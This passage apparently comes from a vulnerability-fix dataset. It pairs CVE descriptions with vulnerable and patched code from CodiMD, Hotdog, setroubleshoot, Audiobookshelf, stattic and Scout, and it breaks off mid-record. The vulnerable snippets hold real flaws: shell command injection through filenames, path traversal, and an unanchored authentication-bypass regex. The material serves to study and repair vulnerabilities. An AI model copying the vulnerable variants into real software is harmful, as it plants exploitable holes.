config.facebook.clientID && config.facebook.clientSecret\nconfig.isGoogleEnable = config.google.clientID && config.google.clientSecret\nconfig.isDropboxEnable = config.dropbox.clientID && config.dropbox.clientSecret\nconfig.isTwitterEnable = config.twitter.consumerKey && config.twitter.consumerSecret\nconfig.isEmailEnable = config.email\nconfig.isOpenIDEnable = config.openID\nconfig.isGitHubEnable = config.github.clientID && config.github.clientSecret\nconfig.isGitLabEnable = config.gitlab.clientID && config.gitlab.clientSecret\nconfig.isMattermostEnable = config.mattermost.clientID && config.mattermost.clientSecret\nconfig.isLDAPEnable = config.ldap.url\nconfig.isSAMLEnable = config.saml.idpSsoUrl\nconfig.isOAuth2Enable = config.oauth2.clientID && config.oauth2.clientSecret\nconfig.isPDFExportEnable = config.allowPDFExport\n\n// Check gitlab api version\nif (config.gitlab && config.gitlab.version !== 'v4' && config.gitlab.version !== 'v3') {\n logger.warn('config.js contains wrong version (' + config.gitlab.version + ') for gitlab api; it should be \\'v3\\' or \\'v4\\'. Defaulting to v4')\n config.gitlab.version = 'v4'\n}\n// If gitlab scope is api, enable snippets Export/import\nconfig.isGitlabSnippetsEnable = (!config.gitlab.scope || config.gitlab.scope === 'api') && config.isGitLabEnable\n\n// Only update i18n files in development setups\nconfig.updateI18nFiles = (env === Environment.development)\n\n// merge legacy values\nlet keys = Object.keys(config)\nconst uppercase = /[A-Z]/\nfor (let i = keys.length; i--;) {\n let lowercaseKey = keys[i].toLowerCase()\n // if the config contains uppercase letters\n // and a lowercase version of this setting exists\n // and the config with uppercase is not set\n // we set the new config using the old key.\n if (uppercase.test(keys[i]) &&\n config[lowercaseKey] !== undefined &&\n fileConfig[keys[i]] === undefined) {\n logger.warn('config.js contains deprecated lowercase setting for ' + keys[i] + '. Please change your config.js file to replace ' + lowercaseKey + ' with ' + keys[i])\n config[keys[i]] = config[lowercaseKey]\n }\n}\n\n// Notify users about the prefix change and inform them they use legacy prefix for environment variables\nif (Object.keys(process.env).toString().indexOf('HMD_') !== -1) {\n logger.warn('Using legacy HMD prefix for environment variables. Please change your variables in future. For details see: https://github.com/codimd/server#environment-variables-will-overwrite-other-server-configs')\n}\n\n// Generate session secret if it stays on default values\nif (config.sessionSecret === 'secret') {\n logger.warn('Session secret not set. Using random generated one. Please set `sessionSecret` in your config.js file. All users will be logged out.')\n config.sessionSecret = crypto.randomBytes(Math.ceil(config.sessionSecretLen / 2)) // generate crypto graphic random number\n .toString('hex') // convert to hexadecimal format\n .slice(0, config.sessionSecretLen) // return required number of characters\n}\n\n// Validate upload upload providers\nif (['filesystem', 's3', 'minio', 'imgur', 'azure', 'lutim'].indexOf(config.imageUploadType) === -1) {\n logger.error('\"imageuploadtype\" is not correctly set. Please use \"filesystem\", \"s3\", \"minio\", \"azure\", \"lutim\" or \"imgur\". Defaulting to \"filesystem\"')\n config.imageUploadType = 'filesystem'\n}\n\n// figure out mime types for image uploads\nswitch (config.imageUploadType) {\n case 'imgur':\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif'\n ]\n break\n default:\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif',\n 'image/svg+xml'\n ]\n}\n\n// generate correct path\nconfig.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n})\n\nconfig.sslCertPath = path.resolve(appRootPath, config.sslCertPath)\nconfig.sslKeyPath = path.resolve(appRootPath, config.sslKeyPath)\nconfig.dhParamPath = path.resolve(appRootPath, config.dhParamPath)\nconfig.viewPath = path.resolve(appRootPath, config.viewPath)\nconfig.tmpPath = path.resolve(appRootPath, config.tmpPath)\nconfig.defaultNotePath = path.resolve(appRootPath, config.defaultNotePath)\nconfig.docsPath = path.resolve(appRootPath, config.docsPath)\nconfig.uploadsPath = path.resolve(appRootPath, config.uploadsPath)\n\n// make config readonly\nconfig = deepFreeze(config)\n\nmodule.exports = config"}], "fix_func": [{"id": "fix_js_293_1", "commit": "c1789474020a6d668d616464cb2da5e90e123f65", "file_path": "lib/config/index.js", "start_line": 1, "end_line": 215, "snippet": "\n'use strict'\n\nconst crypto = require('crypto')\nconst fs = require('fs')\nconst path = require('path')\nconst { merge } = require('lodash')\nconst deepFreeze = require('deep-freeze')\nconst { Environment, Permission } = require('./enum')\nconst logger = require('../logger')\nconst { getGitCommit, getGitHubURL } = require('./utils')\n\nconst appRootPath = path.resolve(__dirname, '../../')\nconst env = process.env.NODE_ENV || Environment.development\nconst debugConfig = {\n debug: (env === Environment.development)\n}\n\n// Get version string from package.json\nconst { version, repository } = require(path.join(appRootPath, 'package.json'))\n\nconst commitID = getGitCommit(appRootPath)\nconst sourceURL = getGitHubURL(repository.url, commitID || version)\nconst fullversion = commitID ? `${version}-${commitID}` : version\n\nconst packageConfig = {\n version: version,\n minimumCompatibleVersion: '0.5.0',\n fullversion: fullversion,\n sourceURL: sourceURL\n}\n\nconst configFilePath = path.resolve(appRootPath, process.env.CMD_CONFIG_FILE ||\n'config.json')\nconst fileConfig = fs.existsSync(configFilePath) ? require(configFilePath)[env] : undefined\n\nlet config = require('./default')\nmerge(config, require('./defaultSSL'))\nmerge(config, require('./oldDefault'))\nmerge(config, debugConfig)\nmerge(config, packageConfig)\nmerge(config, fileConfig)\nmerge(config, require('./oldEnvironment'))\nmerge(config, require('./hackmdEnvironment'))\nmerge(config, require('./environment'))\nmerge(config, require('./dockerSecret'))\n\nif (['debug', 'verbose', 'info', 'warn', 'error'].includes(config.loglevel)) {\n logger.level = config.loglevel\n} else {\n logger.error('Selected loglevel %s doesn\\'t exist, using default level \\'debug\\'. Available options: debug, verbose, info, warn, error', config.loglevel)\n}\n\n// load LDAP CA\nif (config.ldap.tlsca) {\n let ca = config.ldap.tlsca.split(',')\n let caContent = []\n for (let i of ca) {\n if (fs.existsSync(i)) {\n caContent.push(fs.readFileSync(i, 'utf8'))\n }\n }\n let tlsOptions = {\n ca: caContent\n }\n config.ldap.tlsOptions = config.ldap.tlsOptions ? Object.assign(config.ldap.tlsOptions, tlsOptions) : tlsOptions\n}\n\n// Permission\nconfig.permission = Permission\nif (!config.allowAnonymous && !config.allowAnonymousEdits) {\n delete config.permission.freely\n}\nif (!(config.defaultPermission in config.permission)) {\n config.defaultPermission = config.permission.editable\n}\n\n// cache result, cannot change config in runtime!!!\nconfig.isStandardHTTPsPort = (function isStandardHTTPsPort () {\n return config.useSSL && config.port === 443\n})()\nconfig.isStandardHTTPPort = (function isStandardHTTPPort () {\n return !config.useSSL && config.port === 80\n})()\n\n// cache serverURL\nconfig.serverURL = (function getserverurl () {\n var url = ''\n if (config.domain) {\n var protocol = config.protocolUseSSL ? 'https://' : 'http://'\n url = protocol + config.domain\n if (config.urlAddPort) {\n if (!config.isStandardHTTPPort || !config.isStandardHTTPsPort) {\n url += ':' + config.port\n }\n }\n }\n if (config.urlPath) {\n url += '/' + config.urlPath\n }\n return url\n})()\n\nif (config.serverURL === '') {\n logger.warn('Neither \\'domain\\' nor \\'CMD_DOMAIN\\' is configured. This can cause issues with various components.\\nHint: Make sure \\'protocolUseSSL\\' and \\'urlAddPort\\' or \\'CMD_PROTOCOL_USESSL\\' and \\'CMD_URL_ADDPORT\\' are configured properly.')\n}\n\nconfig.Environment = Environment\n\n// auth method\nconfig.isFacebookEnable = config.facebook.clientID && config.facebook.clientSecret\nconfig.isGoogleEnable = config.google.clientID && config.google.clientSecret\nconfig.isDropboxEnable = config.dropbox.clientID && config.dropbox.clientSecret\nconfig.isTwitterEnable = config.twitter.consumerKey && config.twitter.consumerSecret\nconfig.isEmailEnable = config.email\nconfig.isOpenIDEnable = config.openID\nconfig.isGitHubEnable = config.github.clientID && config.github.clientSecret\nconfig.isGitLabEnable = config.gitlab.clientID && config.gitlab.clientSecret\nconfig.isMattermostEnable = config.mattermost.clientID && config.mattermost.clientSecret\nconfig.isLDAPEnable = config.ldap.url\nconfig.isSAMLEnable = config.saml.idpSsoUrl\nconfig.isOAuth2Enable = config.oauth2.clientID && config.oauth2.clientSecret\nconfig.isPDFExportEnable = config.allowPDFExport\n\n// Check gitlab api version\nif (config.gitlab && config.gitlab.version !== 'v4' && config.gitlab.version !== 'v3') {\n logger.warn('config.js contains wrong version (' + config.gitlab.version + ') for gitlab api; it should be \\'v3\\' or \\'v4\\'. Defaulting to v4')\n config.gitlab.version = 'v4'\n}\n// If gitlab scope is api, enable snippets Export/import\nconfig.isGitlabSnippetsEnable = (!config.gitlab.scope || config.gitlab.scope === 'api') && config.isGitLabEnable\n\n// Only update i18n files in development setups\nconfig.updateI18nFiles = (env === Environment.development)\n\n// merge legacy values\nlet keys = Object.keys(config)\nconst uppercase = /[A-Z]/\nfor (let i = keys.length; i--;) {\n let lowercaseKey = keys[i].toLowerCase()\n // if the config contains uppercase letters\n // and a lowercase version of this setting exists\n // and the config with uppercase is not set\n // we set the new config using the old key.\n if (uppercase.test(keys[i]) &&\n config[lowercaseKey] !== undefined &&\n fileConfig[keys[i]] === undefined) {\n logger.warn('config.js contains deprecated lowercase setting for ' + keys[i] + '. Please change your config.js file to replace ' + lowercaseKey + ' with ' + keys[i])\n config[keys[i]] = config[lowercaseKey]\n }\n}\n\n// Notify users about the prefix change and inform them they use legacy prefix for environment variables\nif (Object.keys(process.env).toString().indexOf('HMD_') !== -1) {\n logger.warn('Using legacy HMD prefix for environment variables. Please change your variables in future. For details see: https://github.com/codimd/server#environment-variables-will-overwrite-other-server-configs')\n}\n\n// Generate session secret if it stays on default values\nif (config.sessionSecret === 'secret') {\n logger.warn('Session secret not set. Using random generated one. Please set `sessionSecret` in your config.js file. All users will be logged out.')\n config.sessionSecret = crypto.randomBytes(Math.ceil(config.sessionSecretLen / 2)) // generate crypto graphic random number\n .toString('hex') // convert to hexadecimal format\n .slice(0, config.sessionSecretLen) // return required number of characters\n}\n\n// Validate upload upload providers\nif (['filesystem', 's3', 'minio', 'imgur', 'azure', 'lutim'].indexOf(config.imageUploadType) === -1) {\n logger.error('\"imageuploadtype\" is not correctly set. Please use \"filesystem\", \"s3\", \"minio\", \"azure\", \"lutim\" or \"imgur\". Defaulting to \"filesystem\"')\n config.imageUploadType = 'filesystem'\n}\n\n// figure out mime types for image uploads\nswitch (config.imageUploadType) {\n case 'imgur':\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif'\n ]\n break\n default:\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif',\n 'image/svg+xml'\n ]\n}\n\n// Disable PDF export due to security issue\nif (config.allowPDFExport) {\n config.allowPDFExport = false\n logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')\n}\n\n// generate correct path\nconfig.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n})\n\nconfig.sslCertPath = path.resolve(appRootPath, config.sslCertPath)\nconfig.sslKeyPath = path.resolve(appRootPath, config.sslKeyPath)\nconfig.dhParamPath = path.resolve(appRootPath, config.dhParamPath)\nconfig.viewPath = path.resolve(appRootPath, config.viewPath)\nconfig.tmpPath = path.resolve(appRootPath, config.tmpPath)\nconfig.defaultNotePath = path.resolve(appRootPath, config.defaultNotePath)\nconfig.docsPath = path.resolve(appRootPath, config.docsPath)\nconfig.uploadsPath = path.resolve(appRootPath, config.uploadsPath)\n\n// make config readonly\nconfig = deepFreeze(config)\n\nmodule.exports = config"}], "vul_patch": "--- a/lib/config/index.js\n+++ b/lib/config/index.js\n@@ -189,6 +189,12 @@\n ]\n }\n \n+// Disable PDF export due to security issue\n+if (config.allowPDFExport) {\n+ config.allowPDFExport = false\n+ logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')\n+}\n+\n // generate correct path\n config.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-3101", "cve_description": "Hotdog, prior to v1.0.1, did not mimic the capabilities or the SELinux label of the target JVM process. This would allow a container to gain full privileges on the host, bypassing restrictions set on the container.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/bottlerocket-os/hotdog", "patch_url": ["https://github.com/bottlerocket-os/hotdog/commit/a6fc818dfc5da42f02807250845f75aac0ee9018"], "programing_language": "Go", "vul_func": [{"id": "vul_go_208_1", "commit": "89bd117", "file_path": "cmd/hotdog-poststart-hook/main.go", "start_line": 18, "end_line": 29, "snippet": "func _main() error {\n\tstate, err := hook.State()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thotpatch := exec.Command(\"nsenter\",\n\t\t\"-t\", strconv.Itoa(state.Pid),\n\t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\t\tfilepath.Join(hotdog.ContainerDir, hotdog.HotpatchBinary))\n\treturn hotpatch.Start()\n}"}], "fix_func": [{"id": "fix_go_208_1", "commit": "a6fc818dfc5da42f02807250845f75aac0ee9018", "file_path": "cmd/hotdog-poststart-hook/main.go", "start_line": 21, "end_line": 42, "snippet": "func _main() error {\n\tstate, err := hook.State()\n\tif err != nil {\n\t\treturn err\n\t}\n\tspec, err := hook.Config(state)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif spec.Process.SelinuxLabel != \"\" {\n\t\truntime.LockOSThread()\n\t\tdefer runtime.UnlockOSThread()\n\t\tif err := selinux.SetExecLabel(spec.Process.SelinuxLabel); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\thotpatch := exec.Command(\"nsenter\",\n\t\t\"-t\", strconv.Itoa(state.Pid),\n\t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\t\tfilepath.Join(hotdog.ContainerDir, hotdog.HotpatchBinary))\n\treturn hotpatch.Start()\n}"}], "vul_patch": "--- a/cmd/hotdog-poststart-hook/main.go\n+++ b/cmd/hotdog-poststart-hook/main.go\n@@ -3,7 +3,17 @@\n \tif err != nil {\n \t\treturn err\n \t}\n-\n+\tspec, err := hook.Config(state)\n+\tif err != nil {\n+\t\treturn err\n+\t}\n+\tif spec.Process.SelinuxLabel != \"\" {\n+\t\truntime.LockOSThread()\n+\t\tdefer runtime.UnlockOSThread()\n+\t\tif err := selinux.SetExecLabel(spec.Process.SelinuxLabel); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n \thotpatch := exec.Command(\"nsenter\",\n \t\t\"-t\", strconv.Itoa(state.Pid),\n \t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4446", "cve_description": "The allow_execstack plugin for setroubleshoot allows local users to execute arbitrary commands by triggering an execstack SELinux denial with a crafted filename, related to the commands.getoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718"], "programing_language": "Python", "vul_func": [{"id": "vul_py_392_1", "commit": "dda55aa50db95a25f0d919c3a0d5871827cdc40f", "file_path": "plugins/src/allow_execstack.py", "start_line": 29, "end_line": 34, "snippet": "def is_execstack(path):\n if path[0] != \"/\":\n return False\n\n x = commands.getoutput(\"execstack -q %s\" % path).split()\n return ( x[0] == \"X\" )"}, {"id": "vul_py_392_2", "commit": "dda55aa50db95a25f0d919c3a0d5871827cdc40f", "file_path": "plugins/src/allow_execstack.py", "start_line": 36, "end_line": 50, "snippet": "def find_execstack(exe, pid):\n execstacklist = []\n for path in commands.getoutput(\"ldd %s\" % exe).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n fd = open(\"/proc/%s/maps\" % pid , \"r\")\n for rec in fd.readlines():\n for path in rec.split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n except IOError:\n pass\n\n return execstacklist"}], "fix_func": [{"id": "fix_py_392_1", "commit": "eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718", "file_path": "plugins/src/allow_execstack.py", "start_line": 29, "end_line": 34, "snippet": "def is_execstack(path):\n if path[0] != \"/\":\n return False\n\n x = subprocess.check_output([\"execstack\", \"-q\", path], universal_newlines=True).split()\n return ( x[0] == \"X\" )"}, {"id": "fix_py_392_2", "commit": "eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718", "file_path": "plugins/src/allow_execstack.py", "start_line": 36, "end_line": 50, "snippet": "def find_execstack(exe, pid):\n execstacklist = []\n for path in subprocess.check_output([\"ldd\", exe], universal_newlines=True).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n fd = open(\"/proc/%s/maps\" % pid , \"r\")\n for rec in fd.readlines():\n for path in rec.split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n except IOError:\n pass\n\n return execstacklist"}], "vul_patch": "--- a/plugins/src/allow_execstack.py\n+++ b/plugins/src/allow_execstack.py\n@@ -2,5 +2,5 @@\n if path[0] != \"/\":\n return False\n \n- x = commands.getoutput(\"execstack -q %s\" % path).split()\n- return ( x[0] == \"X\" )\n+ x = subprocess.check_output([\"execstack\", \"-q\", path], universal_newlines=True).split()\n+ return ( x[0] == \"X\" )\n\n--- a/plugins/src/allow_execstack.py\n+++ b/plugins/src/allow_execstack.py\n@@ -1,6 +1,6 @@\n def find_execstack(exe, pid):\n execstacklist = []\n- for path in commands.getoutput(\"ldd %s\" % exe).split():\n+ for path in subprocess.check_output([\"ldd\", exe], universal_newlines=True).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-25205", "cve_description": "Audiobookshelf is a self-hosted audiobook and podcast server. Starting in version 2.17.0 and prior to version 2.19.1, a flaw in the authentication bypass logic allows unauthenticated requests to match certain unanchored regex patterns in the URL. Attackers can craft URLs containing substrings like \"/api/items/1/cover\" in a query parameter (?r=/api/items/1/cover) to partially bypass authentication or trigger server crashes under certain routes. This could lead to information disclosure of otherwise protected data and, in some cases, a complete denial of service (server crash) if downstream code expects an authenticated user object. Version 2.19.1 contains a patch for the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/advplyr/audiobookshelf", "patch_url": ["https://github.com/advplyr/audiobookshelf/commit/bf8407274e3ee300af1927ee660d078a7a801e1c"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_250_1", "commit": "3bc2941", "file_path": "server/Auth.js", "start_line": 18, "end_line": 22, "snippet": " constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n this.ignorePattern = /\\/api\\/items\\/[^/]+\\/cover/\n }"}, {"id": "vul_js_250_2", "commit": "3bc2941", "file_path": "server/Auth.js", "start_line": 30, "end_line": 32, "snippet": " authNotNeeded(req) {\n return req.method === 'GET' && this.ignorePattern.test(req.originalUrl)\n }"}], "fix_func": [{"id": "fix_js_250_1", "commit": "bf8407274e3ee300af1927ee660d078a7a801e1c", "file_path": "server/Auth.js", "start_line": 18, "end_line": 22, "snippet": " constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n this.ignorePatterns = [/\\/api\\/items\\/[^/]+\\/cover/, /\\/api\\/authors\\/[^/]+\\/image/]\n }"}, {"id": "fix_js_250_2", "commit": "bf8407274e3ee300af1927ee660d078a7a801e1c", "file_path": "server/Auth.js", "start_line": 30, "end_line": 32, "snippet": " authNotNeeded(req) {\n return req.method === 'GET' && this.ignorePatterns.some((pattern) => pattern.test(req.originalUrl))\n }"}], "vul_patch": "--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,5 +1,5 @@\n constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n- this.ignorePattern = /\\/api\\/items\\/[^/]+\\/cover/\n+ this.ignorePatterns = [/\\/api\\/items\\/[^/]+\\/cover/, /\\/api\\/authors\\/[^/]+\\/image/]\n }\n\n--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,3 +1,3 @@\n authNotNeeded(req) {\n- return req.method === 'GET' && this.ignorePattern.test(req.originalUrl)\n+ return req.method === 'GET' && this.ignorePatterns.some((pattern) => pattern.test(req.originalUrl))\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3734", "cve_description": "stattic node module suffers from a Path Traversal vulnerability due to lack of validation of path, which allows a malicious user to read content of any file with known path.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/jmjuanes/stattic", "patch_url": ["https://github.com/jmjuanes/stattic/commit/1649daafa646b12d7311640690df967b0107d768"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_41_1", "commit": "952c145", "file_path": "index.js", "start_line": 31, "end_line": 106, "snippet": "module.exports.listen = function (port, cb) {\n //Parse the arguments\n cb = (typeof port === \"function\") ? port : cb;\n port = (typeof port === \"number\") ? parseInt(port) : options.port;\n\n //Get the static files folder path\n options.folder = path.resolve(process.cwd(), options.folder);\n\n //Get the error file path\n options.error = path.resolve(process.cwd(), options.error);\n\n //Initialize the server\n let server = http.createServer(function (req, res) {\n let timeStart = Date.now();\n\n //Check the cors option\n if (options.cors === true) {\n res.setHeader(\"Access-Control-Allow-Origin\", \"*\");\n res.setHeader(\"Access-Control-Allow-Methods\", \"GET, POST, OPTIONS, PUT, PATCH, DELETE\");\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n localPath = path.join(localPath, \"./\" + path.basename(options.index));\n }\n\n //Reponse finish event\n res.on(\"finish\", function () {\n console.log(\"\" + res.statusCode + \" \" + pathname + \" \" + (Date.now() - timeStart) + \" ms\");\n });\n\n //Check if the file exists in this directory\n return utily.fs.isFile(localPath, function (error, exists) {\n if (error) {\n return errorPage(res, 500, \"Error processing your request.\");\n }\n if (exists === false) {\n return errorPage(res, 404, \"File not found.\");\n }\n\n //Write the header with the content type\n res.writeHead(200, {\"Content-Type\": mime.getType(localPath)});\n\n //Initialize the reader stream\n //let reader = fs.createReadStream(local_path, { encoding: \"utf8\" });\n //Remove encoding -> fixed bug reading images (jpg, png, etc...)\n let reader = fs.createReadStream(localPath);\n reader.on(\"data\", function (data) {\n //Write the data to the response\n res.write(data);\n });\n reader.on(\"end\", function () {\n res.end(\"\");\n });\n reader.on(\"error\", function (error) {\n return errorPage(res, 500, \"Something went wrong...\");\n })\n });\n });\n\n //Start server\n server.listen(port, function () {\n if (typeof cb === \"function\") {\n cb.call(null);\n }\n else {\n //Show the console log success\n console.log(\"\");\n console.log(\"Static server listening on: \" + \"http://localhost:\" + options.port + \"\");\n console.log(\"Reading files from: \" + options.folder + \"\");\n console.log(\"\");\n }\n });\n};"}], "fix_func": [{"id": "fix_js_41_1", "commit": "1649daafa646b12d7311640690df967b0107d768", "file_path": "index.js", "start_line": 31, "end_line": 107, "snippet": "module.exports.listen = function (port, cb) {\n //Parse the arguments\n cb = (typeof port === \"function\") ? port : cb;\n port = (typeof port === \"number\") ? parseInt(port) : options.port;\n\n //Get the static files folder path\n options.folder = path.resolve(process.cwd(), options.folder);\n\n //Get the error file path\n options.error = path.resolve(process.cwd(), options.error);\n\n //Initialize the server\n let server = http.createServer(function (req, res) {\n let timeStart = Date.now();\n\n //Check the cors option\n if (options.cors === true) {\n res.setHeader(\"Access-Control-Allow-Origin\", \"*\");\n res.setHeader(\"Access-Control-Allow-Methods\", \"GET, POST, OPTIONS, PUT, PATCH, DELETE\");\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n pathname = path.normalize(pathname); //Fix path traversal\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n localPath = path.join(localPath, \"./\" + path.basename(options.index));\n }\n\n //Reponse finish event\n res.on(\"finish\", function () {\n console.log(\"\" + res.statusCode + \" \" + pathname + \" \" + (Date.now() - timeStart) + \" ms\");\n });\n\n //Check if the file exists in this directory\n return utily.fs.isFile(localPath, function (error, exists) {\n if (error) {\n return errorPage(res, 500, \"Error processing your request.\");\n }\n if (exists === false) {\n return errorPage(res, 404, \"File not found.\");\n }\n\n //Write the header with the content type\n res.writeHead(200, {\"Content-Type\": mime.getType(localPath)});\n\n //Initialize the reader stream\n //let reader = fs.createReadStream(local_path, { encoding: \"utf8\" });\n //Remove encoding -> fixed bug reading images (jpg, png, etc...)\n let reader = fs.createReadStream(localPath);\n reader.on(\"data\", function (data) {\n //Write the data to the response\n res.write(data);\n });\n reader.on(\"end\", function () {\n res.end(\"\");\n });\n reader.on(\"error\", function (error) {\n return errorPage(res, 500, \"Something went wrong...\");\n })\n });\n });\n\n //Start server\n server.listen(port, function () {\n if (typeof cb === \"function\") {\n cb.call(null);\n }\n else {\n //Show the console log success\n console.log(\"\");\n console.log(\"Static server listening on: \" + \"http://localhost:\" + options.port + \"\");\n console.log(\"Reading files from: \" + options.folder + \"\");\n console.log(\"\");\n }\n });\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -20,6 +20,7 @@\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n+ pathname = path.normalize(pathname); //Fix path traversal\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-3734:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/stattic\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest --forceExit ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-47531", "cve_description": "Scout is a web-based visualizer for VCF-files. Due to the lack of sanitization in the filename, it is possible bypass intended file extension and make users download malicious files with any extension. With malicious content injected inside the file data and users unknowingly downloading it and opening may lead to the compromise of users' devices or data. This vulnerability is fixed in 4.89.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/Clinical-Genomics/scout", "patch_url": ["https://github.com/Clinical-Genomics/scout/commit/f59e50f8ea596e641da8a0e9c7a33c0696bcbea5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_381_1", "commit": "679c42e635d4554c630a0018420b163586f9ef48", "file_path": "scout/server/blueprints/panels/controllers.py", "start_line": 303, "end_line": 319, "snippet": "def downloaded_panel_name(panel_obj, format) -> str:\n \"\"\"Return a string with the file name to be downloaded\n\n Args:\n panel_obj(dict): scout.models.panel.gene_panel\n format(str): \"pdf\" or \"txt\"\n Returns:\n a string describing the panel\n \"\"\"\n return \"_\".join(\n [\n panel_obj[\"panel_name\"],\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n ]\n )"}], "fix_func": [{"id": "fix_py_381_1", "commit": "f59e50f8ea596e641da8a0e9c7a33c0696bcbea5", "file_path": "scout/server/blueprints/panels/controllers.py", "start_line": 304, "end_line": 322, "snippet": "def downloaded_panel_name(panel_obj, format) -> str:\n \"\"\"Return a string with the file name to be downloaded\n\n Args:\n panel_obj(dict): scout.models.panel.gene_panel\n format(str): \"pdf\" or \"txt\"\n Returns:\n a string describing the panel\n \"\"\"\n sanitized_panel_id = re.sub(r\"[^a-zA-Z_\\-]+\", \"\", panel_obj[\"panel_name\"])\n\n return \"_\".join(\n [\n sanitized_panel_id,\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n ]\n )"}], "vul_patch": "--- a/scout/server/blueprints/panels/controllers.py\n+++ b/scout/server/blueprints/panels/controllers.py\n@@ -7,9 +7,11 @@\n Returns:\n a string describing the panel\n \"\"\"\n+ sanitized_panel_id = re.sub(r\"[^a-zA-Z_\\-]+\", \"\", panel_obj[\"panel_name\"])\n+\n return \"_\".join(\n [\n- panel_obj[\"panel_name\"],\n+ sanitized_panel_id,\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-24976", "cve_description": "Distribution is a toolkit to pack, ship, store, and deliver container content. Systems running registry versions 3.0.0-beta.1 through 3.0.0-rc.2 with token authentication enabled may be vulnerable to an issue in which token authentication allows an attacker to inject an untrusted signing key in a JSON web token (JWT). The issue lies in how the JSON web key (JWK) verification is performed. When a JWT contains a JWK header without a certificate chain, the code only checks if the KeyID (`kid`) matches one of the trusted keys, but doesn't verify that the actual key material matches. A fix for the issue is available at commit 5ea9aa028db65ca5665f6af2c20ecf9dc34e5fcd and expected to be a part 